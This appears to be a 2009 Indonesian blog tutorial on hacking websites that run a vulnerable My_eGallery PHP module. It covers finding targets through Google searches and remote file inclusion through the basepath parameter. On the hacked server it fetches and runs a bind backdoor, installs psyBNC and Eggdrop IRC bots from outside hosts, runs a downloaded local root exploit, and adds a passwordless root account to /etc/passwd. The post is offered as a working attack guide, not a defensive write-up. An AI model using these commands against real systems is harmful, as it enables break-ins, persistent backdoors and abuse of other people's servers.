Sabtu, 24 Januari 2009

Cara Menginject Website dg Target Php

: CARA MENG-INJECT WEBSITE DENGAN TARGET PHP :

1. Cari target di google.com dengan menggunakan keyword
+My_eGallery index = .com atau
+My_eGallery main = .com, bisa juga
+My_eGallery index = .net, atau
+My_eGallery main = .net

2. Target telah ditemukan, kemudian gunakan formula :
Target + File Inject + cd var/tmp + command = Hasil Inject
Contoh :

http://www.target.com/modules/my_eGallery/index.php?basepath=http://www.varemat.com/admini/jinho/injeck.txt?&cmdvar;cd tmp;ls –al

3. Setelah formula tersebut digunakan, maka website target yang telah dihack akan memunculkan daftar folder shell. Apabila website yang telah diinject memunculkan daftar folder shell, maka gunakan command :

find /-type d –perm 777
Dimana command tersebut digunakan untuk mencari folder shell yang bisa dipakai.

4. Setelah folder anda dibuat, maka downloadlah file bind atau psybnc untuk mencoba apakah folder yang anda buat tadi dapat digunakan atau tidak. File Bind digunakan untuk mengaccess shell hasil target ke dalam putty. Contoh :

http://www.target.com/modules/my_eGallery/index.php?basepath=http://www.varemat.com/admini/jinho1.txt?&cmd
var;cd tmp; <----- ditambahkan command dibawah ini :
mkdir …
chmod 777 …
cd …
wget geocities.com/aa_sunda/bind.txt, atau
fetch http://www.geocities.com/aa_sunda/bind.txt
ls -alF
mv bind.txt a.c
gcc –o a a.c
chmod 777 a
./a

Catatan : Setiap command yang ditambahkan, gunakanlah di depan command tersebut target berikut file injectnya.

6. Setelah command diatas digunakan akan terlihat “ Arsad Backdoor”. Nah setelah itu, maka bukalah file putty.exe untuk mengaccess shell dengan target host sesuai dengan nama target hasil inject, atau bisa juga dengan men-DNS target ke dalam irc server untuk mengetahui IP address target yang sesunguhnya. Masih di dalam file putty, ubahlah port 22 telnet menjadi port 1980 telnet, kemudian tekan Enter.

7. Setelah masuk ke dalam shell, akan muncul “Password : “. Hal ini dimaksudkan file bind yang telah anda tanam berhasil diproses. Kemudian masukkan password untuk mengaccess shell tersebut. Contoh : Password : cavalera

8. Setelah password dimasukkan, maka anda telah siap untuk beroperasi di dalam shell target yang anda dapatkan.

9. Cara beroperasi di dalam shell dapat anda lihat pada CARA OPERASI SHELL.

10. Dengan cara yang sama anda dapat langsung mengoperasikan hasil target pada website. Gunakan langsung perintah wget atau fetch untuk mendownload file ke dalam shell target anda.Contoh Untuk Menginstall PsyBNC langsung dalam target website :

http://www.target.com/modules/my_eGallery/index.php?basepath=http://www.varemat.com/admini/jinho/injeck.txt?&cmd
var;cd tmp; <----- ditambahkan command dibawah ini :
mkdir …
chmod 777 …
cd …
wget www.baganbatu.com/psy.tar.gz, atau
fetch http://h1.ripway.com/jinho/psy.tar.gz
tar –zxvf psy.tar.gz
cd .psy
./config
./fuck
./run <----- psyBNC dengan port 31337

atau

http://www.target.com/modules/my_eGallery/index.php?basepath=http://www.varemat.com/admini/jinho/injeck.txt?&cmd
var;cd tmp; <----- ditambahkan command dibawah ini :
mkdir …
chmod 777 …
cd …
wget http://h1.ripway.com/jinho/psy.tar.gz, atau
fetch http://geocities.com/baganbatu@ymail.com/psy.tar.gz
tar –zxvf psy.tar.gz
rm –rf psy.tar.gz <----- dimaksudkan untuk menghapus file
cd .psy
./config <--- contoh : ./config 20000
./fuck
./run <----- psyBNC dengan port 20000

Catatan : Tidak semua port yang anda gunakan dapat dijinkan (Aborting Port), untuk lebih jelasnya carilah tutorial/cara khusus menginstall psybnc di website google.com. Disana anda dapat dengan mudah dan memahami cara menginstall psyBNC.

11. Selesai
CARA OPERASI SHELL :
Setelah anda masuk di dalam shell target dengan menggunakan putty. Gunakanlah command berikut ini cd var/tmp
ls –alF
mkdir …
chmod 777 …
cd …
ls –alF

Catatan : untuk mengetahui cara menginstall psyBNC, Bot Eggdrop, dan Eksploit Local Root lihatlah pada uraian di bawah ini.

1. Untuk menginstall psyBNC di dalam shell gunakan command di bawah ini :

wget http://h1.ripway.com/jinho/psy.tar.gz, atau
fetch http://www.baganbatu.com/psy.tar.gz
tar –xzvf psy.tar.gz
chmod 777 .psy
cd .psy
./config
./fuck
./run

2. Untuk menginstall Bot Eggdrop dengan menggunakan file precompile, ikuti command di bawah ini

wget http://h1.ripway.com/jinho/jinho.tar.gz, atau
fetch http://geocities.com/baganbatu@ymail.com/jinho.tar.gz
tar –zxvf jinho.tar.gz
rm –rf jinho.tar.gz
chmod 777 .egg
cd .egg
./ayu (file config bot) (nick bot) (ident bot) (IP adress) (channel
tanpa #) (nick owner) <--- contoh : ./ayu conf botdent user 203.14.155.134 riauhacker jinho
./dssl conf

Setelah command diatas selesai, maka anda tinggal menunggu bot yang anda buat masuk ke dalam channel yang telah anda setting. Apabila bot yang anda buat tidak muncul juga, berarti IP address yang anda gunakan pada bot telah kena Akill. Gantilah IP Address tadi dengan IP Address
lainnya.Apabila anda bingung, bagaimana caranya mengetahui IP Address yang ada, gunakan command

/sbin/ifconfig

Setelah IP Address yang ada ditampilkan, segeralah mengganti IP Address bot tadi dengan IP Address yang ada.

3. Untuk mengeksploit local root gunakan perintah dibawah ini :

wget geocities.com/bankbankdut/root.tar.gz, atau
fetch http://www.geocities.com/bankbankdut/root.tar.gz
tar –xzvf root.tar.gz
rm –rf root.tar.gz
mv root .ssh
chmod 777 .ssh
cd .ssh
./root

Apabila hasil yang ditampilkan dari command diatas memunculkan kata “Signed …… OK” berikut nomor pid (Contoh : 13657), maka anda telah berhasil mencapai access root. Stelah berhasil dalam mengeksploit local root, gunakan command berikut :

Whoami <----- Untuk mengetahui access anda dalam shell pada saat
beroperasi
Su
Adduser (Username)
(Password User)

Baiklah, ada cara lain yang memungkinkan kita mendapatkan root. Pada metode pertama, kita mengetikkan 'linuxconf' pada bash shell prompt, bagaimanapun, kita dapat mengetik hal berikut untuk membuat suatu account baru dengan kemampuan root dan tanpa password:

echo "ankit::0:0:::" >> /etc/passwd

Perintah ini secara langsung mengedit file /etc/passwd yang merupakan password file yang menyimpan Password dan Username dari untuk account pada mesin tersebut. Sesuatu hal yang perlu diingat disini adalah anda hanya dapat mengedit file /etc/passwd jika anda melakukan login sebagai root, dan dalam hal ini kita melakukan boot ke linux dengan linux single, jadi kita dapat melakukannya.Untuk mengerti bagaimana persisnya perintah diatas bekerja dan bagaimana hal tersebut dapat membuat suatu account baru tanpa password, kita perlu mengerti struktur file /etc/passwd.Berikut ini adalah suatu baris dari password file:

ankit:my_password:2:3:Ankit Fadia:/home/ankit:/bin/bash

Baris tersebut diatas dapat dipecahkan menjadi:
? Username: ankit
? Encrypted Password: my_password
? User number: 2
? Group Number: 3
? Actual Name: Ankit Fadia (Optional)
? Home Directory: /home/ankit (Optional)
? Type of Shell: /bin/bash (Optional)
Pada perintah diatas, kita tidak mengikutsertakan field-field optional
dan field password. Perintah kita:

echo "ankit::0:0:::" >> /etc/passwd

dapat ditulis sebagai:
? Username: ankit
? Encrypted Password:
? User number: 0
? Group Number: 0
? Actual Name:
? Home Directory:
? Type of Shell:
Pada dasarnya hal ini akan membuat suatu account baru dengan kemampuan root, yang mana dapat anda gunakan sebagai Backdoor kedalam sistem.“ SEMOGA TUTORIAL INI DAPAT BERMANFAAT,JANGAN CEPAT PUTUS ASA ”SELAMAT MENCOBA"

Tidak ada komentar: